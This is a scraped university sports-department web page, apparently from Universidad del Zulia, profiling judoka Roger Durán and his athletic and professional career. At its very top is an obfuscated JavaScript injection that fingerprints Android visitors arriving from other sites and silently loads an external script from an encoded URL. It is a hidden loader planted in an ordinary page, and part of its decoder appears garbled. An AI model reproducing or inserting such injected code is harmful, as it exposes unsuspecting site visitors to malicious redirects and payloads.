;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("dt(naevg)A!rueesiuu")],q=n[p("2mlrxohfntza0lipy")],t=d[p("3e!ifkho2o8co")],o=w[p("sn0oqiwt6amtmnde2izrxos")],h=w[p("rnhofi0t9adcaoll1")][p("beamlann8t(s3odhy")],dr=d[p("qrkemrbrvetf5elr4")],dt=s.height/w.devicePixelRatio-w.screenTop;if(!c(dr,h)&&dr!==''){if(dt>0&&o!==undefined){if(c(u,p("!d1ito!rbd3noAy"))&&!c(u,p("1s0wsocdhngiiWk"))){if(c(q,p("!d1ito!rbd3noAy"))||c(q,p("jxdueniilLe"))){if(!c(t,p("2=3a4m8tnu3_a_v"))){var e=d.createElement('script');e.type='text/javascript';e.async=true;e.src=p('hafdy4i64798l9uf89xfxf6d57ce06c6zfyed5c6y58dl5u9d4d8n0x2ddfc7fxcl=ov)&m2(1q=jdxilcv?uskjj.(e2dio(ne_pibuk/am7opci.z5(633asgtrantpsrk2coioluco/h/s:dsspztxtzh(');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(e,v)}}}}}function p(e){var k='';for(var w=0;w=0;q--){d+=a[q]}return d}})(); Roger Durán - Dirección de Deportes
Universidad del Zulia
Correo LUZMapa del sitio
24 de octubre de 2018
 
Programas
Alto Rendimiento Educ.Fisica y Recreación Deporte Interno Extensión Deportiva Actividad Física Recreación Atención al Atleta Entrenamientos Registro Atleta LUZ Pequeña Liga de Béisbol
Juegos Deportivos
Condiciones Generales
Afiches deportivos
Posición Final 2010
Posición Final 2011
Planilla de inscripción
Más Deporte
Juvines 2010
Juvines 2012
Juvineu 2015

images/stories/topes/sucesion.jpg

Agrandar texto   Reducir texto   Reestablecer texto    
Roger Durán PDF Imprimir Correo

Premio Luis Aparicio
Buen Estudiante Deportista de LUZ
1990


Al momento de adjudicarse el Premio “Luis Aparicio” buen estudiante –deportista de LUZ en el año 1988, este destacado judoca ostentaba el titulo de tricampeón nacional universitario alcanzado en los  VI, VII y VIII Juegos Venezolanos de Institutos de Educación Superior (Juvines).
 

Campeón nacional en primera categoría los años 1990 y 1995. Campeón Suramericano de Judo  y medalla de bronce en los Juegos Centroamericanos y del Caribe de México 1990.

Egresó de nuestra institución en el año 1997;  obteniendo el titulo de Ingeniero Agrónomo y a partir de ese momento su retiro de la actividad competitiva fue determinante para dedicarse a su ejercicio profesional.


Trabajó como docente deportivo en un instituto de educación básica. Posteriormente se dedicó a laborar en empresas comerciales; específicamente en el área de mercadeo.


Preocupado por su mejoramiento profesional realizó estudios de postgrado en la Universidad Rafael Belloso Chacín;  donde culminó satisfactoriamente la maestría en Gerencia de Mercadeo.


Actualmente se desempeña como representante de ventas de de una reconocida empresa venezolana.

                                                                                                                                Redacción: Yasmira Meleán Marin

                                                                                                                                Fotografia: Claudio Ocando
                                                                                                                                Febrero de 2004 

 




^ Subir